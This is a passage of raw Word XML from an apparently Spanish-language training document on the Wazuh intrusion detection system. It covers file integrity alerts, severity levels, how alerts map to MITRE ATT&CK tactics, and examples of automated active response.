            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6A8B" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>&lt;/syscheck&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6A8C" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6A8D" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="6A9955"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t># Cuando /etc/passwd es modificado, Wazuh genera:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6A8E" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Rule ID: 550 — Integrity checksum changed</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6A8F" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Level: 7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6A90" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Description: File '/etc/passwd' modified</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6A91" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>syscheck.md5_before: a1b2c3d4...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6A92" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>syscheck.md5_after:  e5f6a7b8...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6A93" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>syscheck.uname_after: root</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F3C6A95" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="009E121D">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F3C6A96" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1812">
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>4.2.2 Detección de intrusos y análisis de logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3C6A97" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1812">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>Wazuh analiza los logs del sistema operativo en tiempo real aplicando sus reglas de detección. Las reglas están organizadas por nivel de severidad del 1 al 15 — donde 1 es informativo y 15 es crítico. El Manager incluye miles de reglas predefinidas para los ataques más comunes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3C6A98" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="009E121D">
      <w:pPr>
        <w:spacing w:before="6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080"/>
        <w:gridCol w:w="4680"/>
      </w:tblGrid>
      <w:tr w:rsidR="009E121D" w14:paraId="2F3C6A9C" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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2F3C6A99" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Nivel Wazuh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="308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2F3C6A9A" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Significado</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2F3C6A9B" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Ejemplo de evento</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E121D" w:rsidRPr="003C1812" w14:paraId="2F3C6AA0"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F3C6A9D" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="308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F3C6A9E" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Informativo — actividad normal</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F3C6A9F" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Login exitoso, inicio de servicio</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E121D" w:rsidRPr="003C1812" w14:paraId="2F3C6AA4"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2F3C6AA1" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>4-6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="308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2F3C6AA2" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Bajo — actividad inusual pero no necesariamente maliciosa</w:t>
            </w:r>
          </w:p>
        </w:tc>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2F3C6AA3" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Múltiples conexiones desde la misma IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E121D" w:rsidRPr="003C1812" w14:paraId="2F3C6AA8"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F3C6AA5" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7-9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="308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F3C6AA6" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Medio — probable ataque o configuración incorrecta</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F3C6AA7" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Intentos de login fallidos repetidos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E121D" w:rsidRPr="003C1812" w14:paraId="2F3C6AAC"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2F3C6AA9" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="308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2F3C6AAA" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Alto — ataque confirmado o intento de explotación</w:t>
            </w:r>
          </w:p>
        </w:tc>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2F3C6AAB" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Brute force SSH detectado, escaneo de puertos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E121D" w:rsidRPr="003C1812" w14:paraId="2F3C6AB0"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F3C6AAD" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>13-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="308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F3C6AAE" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Crítico — compromiso activo probable</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F3C6AAF" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Rootkit detectado, escalación de privilegios, archivo crítico modificado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F3C6AB1" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="009E121D">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F3C6AB2" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1812">
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>4.2.3 Compliance y MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3C6AB3" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1812">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>Wazuh mapea automáticamente cada alerta con el framework MITRE ATT&amp;CK, que clasifica las técnicas de ataque en tácticas (qué quiere lograr el atacante) y técnicas (cómo lo logra). Esto permite al analista identificar en qué fase del ciclo de ataque se encuentra una amenaza y qué controles aplican.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3C6AB4" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="009E121D">
      <w:pPr>
        <w:spacing w:before="6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121D" w:rsidRPr="003C1812" w14:paraId="2F3C6ABB" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="2E74B5"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="2E74B5"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="2E74B5"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="2E74B5"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF3FB"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2F3C6AB5" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="80"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F4E79"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Las tácticas MITRE ATT&amp;CK más frecuentes en alertas Wazuh</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6AB6" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>TA0001 — Initial Access: cómo el atacante entra — phishing, explotación de servicios públicos, credenciales comprometidas.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6AB7" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>TA0003 — Persistence: cómo el atacante se mantiene — crontabs, servicios nuevos, modificación de archivos de inicio.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6AB8" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>TA0004 — Privilege Escalation: cómo el atacante sube permisos — sudo misconfiguration, SUID binaries, exploits de kernel.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6AB9" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:t>TA0006 — Credential Access: cómo roba credenciales — /etc/shadow, credential dumping, keyloggers.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6ABA" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>TA0010 — Exfiltration: cómo saca datos — conexiones salientes inusuales, compresión y cifrado de archivos, DNS tunneling.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F3C6ABC" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="009E121D">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F3C6ABD" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1812">
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>4.2.4 Respuesta activa (Active Response)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3C6ABE" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1812">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>Wazuh no solo detecta — también puede responder automáticamente cuando detecta una amenaza. La respuesta activa ejecuta scripts configurados en el agente cuando se activa una regla específica. Esto lo convierte en un sistema de detección y respuesta, no solo de detección.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3C6ABF" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="009E121D">
      <w:pPr>
        <w:spacing w:before="6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121D" w:rsidRPr="003C1812" w14:paraId="2F3C6AC5" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="2E74B5"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="2E74B5"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="2E74B5"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="2E74B5"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF3FB"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2F3C6AC0" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="80"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F4E79"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Ejemplos de respuesta activa en Wazuh</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6AC1" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Bloquear una IP automáticamente con iptables cuando se detectan más de 10 intentos de login fallidos en 60 segundos (Rule ID 5710).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6AC2" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Ejecutar un script de aislamiento de red cuando se detecta un posible rootkit (Level 15).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6AC3" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Enviar una notificación por email o Slack cuando se detecta un cambio en /etc/passwd.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C6AC4" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Reiniciar un servicio automáticamente si el HIDS detecta que fue manipulado.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F3C6AC6" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="009E121D">
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="189021B6" w14:textId="77777777" w:rsidR="00683736" w:rsidRPr="003C1812" w:rsidRDefault="00683736">
      <w:pPr>
        <w:spacing w:before="8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5"/>
        <w:gridCol w:w="8675"/>
      </w:tblGrid>
      <w:tr w:rsidR="009E121D" w:rsidRPr="003C1812" w14:paraId="2F3C6ACC" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="7F6000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="7F6000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="7F6000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="7F6000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="7F6000"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2F3C6AC7" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>💡</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8960" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="7F6000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="7F6000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="7F6000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="7F6000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
